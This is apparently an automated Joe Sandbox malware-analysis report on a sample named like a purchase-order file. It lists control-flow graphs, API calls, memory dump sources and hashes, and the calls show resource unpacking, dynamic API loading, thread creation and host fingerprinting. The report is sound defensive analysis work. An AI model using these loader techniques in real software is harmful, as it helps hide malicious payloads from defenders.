                                                                                                                                                                                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 13 401c73-401c77 8->13 15 401c93-401c95 13->15 16 401c79-401c7b 13->16 21 401c98-401c9a 15->21 19 401c7d-401c83 16->19 20 401c8f-401c91 16->20 19->15 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->13 23->20 34 401cd0-401cd4 24->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 39 401f1c-401f2f 30->39 40 401f5f-401f69 30->40 36 401cf0-401cf2 34->36 37 401cd6-401cd8 34->37 38 401cf5-401cf7 36->38 41 401cda-401ce0 37->41 42 401cec-401cee 37->42 38->25 44 401cf9-401d09 Module32Next 38->44 45 401f33-401f5d call 401560 39->45 46 401f73-401f75 40->46 47 401f6b-401f72 40->47 41->36 43 401ce2-401cea 41->43 42->38 43->34 43->42 44->7 50 401d0f 44->50 45->40 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 46->48 49 401f77-401f8d call 401560 46->49 47->46 48->5 87 4021aa-4021c0 48->87 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 71 401d42-401d4a 66->71 67->68 68->25 69 401d5d-401d7b call 401650 68->69 76 401d80-401d84 69->76 71->61 71->67 78 401da0-401da2 76->78 79 401d86-401d88 76->79 83 401da5-401da7 78->83 81 401d8a-401d90 79->81 82 401d9c-401d9e 79->82 81->78 85 401d92-401d9a 81->85 82->83 83->25 86 401dad-401dbd Module32Next 83->86 85->76 85->82 86->7 86->54 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 34ad01d 122->154 155 40234e call 34ad006 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 34ad01d 135->152 153 402390 call 34ad006 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                                                      • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                                                      • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                                                      • API String ID: 1430744539-2962942730
                                                                                                                                                                                                                                      • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: d$w
                                                                                                                                                                                                                                      • API String ID: 0-2400632791
                                                                                                                                                                                                                                      • Opcode ID: 19109f927d30e16e5193e51d30843697fa20c3c05d1da147f2888d79a20904d8
                                                                                                                                                                                                                                      • Instruction ID: 7ab5085091e2ec344b3aabc51904ed195696b7fd9269c362867f25c8c0224a4e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19109f927d30e16e5193e51d30843697fa20c3c05d1da147f2888d79a20904d8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FC1563194C34CABEAF5DA248C09B767F20EB5562CF4D09D7E746860F2E72189DCC652
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFreeLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1762890227-0
                                                                                                                                                                                                                                      • Opcode ID: a574a6945b14e5eab42ab038c0475e30d7c28f18a8d5c91604cbe83d6e6bebc4
                                                                                                                                                                                                                                      • Instruction ID: aecddd0f81a663002f14acf1b8fcf9c77b58cc4103b4530ee56004668bf3c320
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a574a6945b14e5eab42ab038c0475e30d7c28f18a8d5c91604cbe83d6e6bebc4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86F16D2590D3809FDBF646284C09735BB61EF56728F4D4BCAF792CA0F2E764490CE252

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 763 40cbf7-40cc06 764 40cc08-40cc14 763->764 765 40cc2f 763->765 764->765 766 40cc16-40cc1d 764->766 767 40cc33-40cc3d call 40d534 765->767 766->765 768 40cc1f-40cc2d 766->768 771 40cc47-40cc4e call 41087e 767->771 772 40cc3f-40cc46 call 40cbb4 767->772 768->767 777 40cc50-40cc57 call 40cbb4 771->777 778 40cc58-40cc68 call 4129c9 call 411a15 771->778 772->771 777->778 785 40cc72-40cc8e GetCommandLineA call 412892 call 4127d7 778->785 786 40cc6a-40cc71 call 40e79a 778->786 793 40cc90-40cc97 call 40e79a 785->793 794 40cc98-40cc9f call 41255f 785->794 786->785 793->794 799 40cca1-40cca8 call 40e79a 794->799 800 40cca9-40ccb3 call 40e859 794->800 799->800 805 40ccb5-40ccbb call 40e79a 800->805 806 40ccbc-40cce2 call 4019f0 800->806 805->806 811 40cce4-40cce5 call 40ea0a 806->811 812 40ccea-40cd2e call 40ea36 call 40e21d 806->812 811->812
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2598563909-0
                                                                                                                                                                                                                                      • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                                                                                                                                                                      • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 137eb3856fe8045d6fb70000a78b4ddc6c7d77b2c6af52e2a5b4a0157cd282ac
                                                                                                                                                                                                                                      • Instruction ID: 6d1eb3c378685e02ceb9a6b79fda8417518c15947944e6207adaf24e139213ee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 137eb3856fe8045d6fb70000a78b4ddc6c7d77b2c6af52e2a5b4a0157cd282ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11A27D7250D3828FD735CB18C8447EABBE1EFC5318F09899AE5D997292E335A404CB97

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1264 2bdb180-2bdb18f 1265 2bdb2a3 1264->1265 1266 2bdb2a5 1265->1266 1267 2bdb306-2bdb30b 1265->1267 1266->1267 1269 2bdb2a7-2bdb2c0 SetFilePointerEx 1266->1269 1273 2bdb23b 1267->1273 1274 2bdb196-2bdb1ba 1267->1274 1271 2bdb38d-2bdb395 1269->1271 1272 2bdb2c6 1269->1272 1272->1271 1275 2bdb2cc-2bdb2d0 1272->1275 1273->1274 1280 2bdb241 1273->1280 1276 2bdb3a6-2bdb3ac 1274->1276 1277 2bdb1c0 1274->1277 1278 2bdb1df-2bdb1e6 1275->1278 1279 2bdb2d6 1275->1279 1284 2bdb328-2bdb346 SetFilePointerEx 1276->1284 1285 2bdb3b2-2bdb3b7 1276->1285 1277->1276 1281 2bdb1c6-2bdb1d3 1277->1281 1279->1278 1282 2bdb2dc-2bdb2de 1279->1282 1280->1267 1283 2bdb247 1280->1283 1286 2bdb1d9 1281->1286 1287 2bdb2e0-2bdb2ed WriteFile 1281->1287 1282->1287 1288 2bdb24d 1283->1288 1289 2bdb322 1283->1289 1286->1278 1286->1287 1288->1289 1291 2bdb253-2bdb262 1288->1291 1289->1284 1290 2bdb0d0-2bdb0d8 SetFilePointerEx 1289->1290 1292 2bdb0de 1290->1292 1293 2bdb054-2bdb056 1290->1293 1292->1264 1294 2bdb05c-2bdb061 1293->1294
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32 ref: 02BDB2BA
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 02BDB2E0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$PointerWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 539440098-0
                                                                                                                                                                                                                                      • Opcode ID: 628608e54d0931bb4c88bf7fec04a1eedf92d64cd9bf0ff4476910c6dba7f82a
                                                                                                                                                                                                                                      • Instruction ID: c22839ae21d8bec629ccdf4b7cc9dfe6319e7d9978c6cc1e5c6dd06ee2884755
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 628608e54d0931bb4c88bf7fec04a1eedf92d64cd9bf0ff4476910c6dba7f82a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D331616544C3849FE7118B2588157AEBFE0AB9272CF4A85CDE4D986291F3B48408D793

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1295 40af66-40af6e 1296 40af7d-40af88 call 40b84d 1295->1296 1299 40af70-40af7b call 40d2e3 1296->1299 1300 40af8a-40af8b 1296->1300 1299->1296 1303 40af8c-40af98 1299->1303 1304 40afb3-40afca call 40af49 call 40cd39 1303->1304 1305 40af9a-40afb2 call 40aefc call 40d2bd 1303->1305 1305->1304
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                                                                                                                      • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1314 2bf7df0-2bf7dfa 1315 2bf8288-2bf829a call 2be0d80 1314->1315 1316 2bf7e00 1314->1316 1323 2bf851e-2bf852d call 2be0d80 1315->1323 1324 2bf82a0 1315->1324 1316->1315 1317 2bf7e06-2bf7e15 GetComputerNameW 1316->1317 1319 2bf7e1b 1317->1319 1320 2bf82b6-2bf82bb 1317->1320 1319->1320 1322 2bf7e21-2bf7e2d 1319->1322 1324->1323 1325 2bf82a6 1324->1325 1328 2bf7dbc-2bf7dce 1325->1328 1329 2bf82ac 1325->1329 1336 2bf7d6c-2bf7d80 GetVolumeInformationW 1328->1336 1337 2bf7d35 1328->1337 1332 2bf82b2-2bf82b4 1329->1332 1333 2bf7d20-2bf7d2b 1329->1333 1332->1320 1334 2bf7d2d-2bf7d94 1333->1334 1335 2bf7d61-2bf7d68 1333->1335 1334->1335 1345 2bf7d96 1334->1345 1338 2bf7d6a 1335->1338 1339 2bf7de5-2bf7dea 1335->1339 1337->1336 1341 2bf7d37-2bf7d39 1337->1341 1338->1336 1338->1339 1343 2bf7dec 1339->1343 1344 2bf7d83-2bf7d8c GetWindowsDirectoryW 1339->1344 1342 2bf7d3b-2bf7d46 1341->1342 1346 2bf7d48-2bf7dac 1342->1346 1347 2bf7d97-2bf7d98 1342->1347 1343->1344 1348 2bf7dee 1343->1348 1344->1342 1349 2bf7d8e-2bf7da6 1344->1349 1345->1347 1346->1347 1355 2bf7dae-2bf7db3 1346->1355 1352 2bf7d9a-2bf7d9f 1347->1352 1353 2bf7de2 1347->1353 1348->1314 1349->1328 1354 2bf7da8 1349->1354 1354->1328 1356 2bf7daa-2bf7dba 1354->1356 1356->1328
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                                                                                      • Opcode ID: 8391bf0671d2a896efd30401de8b8d42d260b12ce17eb9e749a2fcd653a4e1dd
                                                                                                                                                                                                                                      • Instruction ID: 59957b5baac4b79084d3d876167b89e8ddd78758b7150afd9d37f27c4dfd640f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8391bf0671d2a896efd30401de8b8d42d260b12ce17eb9e749a2fcd653a4e1dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2621F4EFA493442BF6F596189C06BB9FA35EB41754FC844C9F78A150E2DF64240CE262

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1425 2bd5a3b-2bd5a3f 1426 2bd4f7c 1425->1426 1427 2bd5a45 1425->1427 1430 2bd5054-2bd505d call 2bd5d20 1426->1430 1431 2bd4f82 1426->1431 1428 2bd51ae-2bd51d6 1427->1428 1429 2bd5a4b-2bd5a53 CreateThread 1427->1429 1432 2bd5a59-2bd5b6f RtlExitUserThread call 2bd5d20 1429->1432 1431->1430 1433 2bd4f88-2bd4f91 1431->1433 1453 2bd5b71 1432->1453 1453->1453
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,02BD55C0,?,00000000,00000000), ref: 02BD5A51
                                                                                                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 02BD5B11
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$CreateExitUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4108186749-0
                                                                                                                                                                                                                                      • Opcode ID: 1435e08a913649254f0bc9989508f4680be10e63e202e71c132b920dffc13f60
                                                                                                                                                                                                                                      • Instruction ID: d2a044dd12ce28cffb094d2ddf3a0440987c2061e2fe59ef2ba7bbb64732a696
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1435e08a913649254f0bc9989508f4680be10e63e202e71c132b920dffc13f60
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C11675150D3C24FE7338B2888657E6AFA09F53124F8D06D6D5A08E0E2F369590C83A3

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1454 40e7ee-40e7f6 call 40e7c3 1456 40e7fb-40e7ff ExitProcess 1454->1456
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                                                                                        • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                                                                                        • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                                                                                        • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2427264223-0
                                                                                                                                                                                                                                      • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                                                      • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1505 2bd5d20 1506 2bd5d26-2bd5d2d 1505->1506 1507 2bd5d22 1505->1507 1509 2bd5d2f 1506->1509 1510 2bd5d36-2bd5d37 1506->1510 1507->1506 1508 2bd5d24 1507->1508 1508->1506 1509->1510 1511 2bd5d30-2bd5d31 1509->1511 1512 2bd5d5d 1510->1512 1513 2bd5d39-2bd5d42 VirtualAlloc 1510->1513 1515 2bd5d33-2bd5d35 1511->1515 1516 2bd5d5f 1512->1516 1517 2bd5d64 1512->1517 1514 2bd5d44 1513->1514 1513->1515 1514->1515 1518 2bd5d46-2bd5d50 1514->1518 1515->1510 1516->1517 1519 2bd5d61 1516->1519 1520 2bd5d69-2bd5d73 VirtualFree 1517->1520 1521 2bd5d66 1517->1521 1522 2bd5d54-2bd5d5b 1518->1522 1523 2bd5d52 1518->1523 1519->1517 1524 2bd5d63 1519->1524 1521->1520 1525 2bd5d68 1521->1525 1522->1512 1522->1517 1523->1522 1524->1517 1525->1520
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02BD5D6D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                                                                                      • Opcode ID: 8d90f0972137776cdfbcd50ab9e155338a8bf24dc0e3c5dfd5eceef02e6e7877
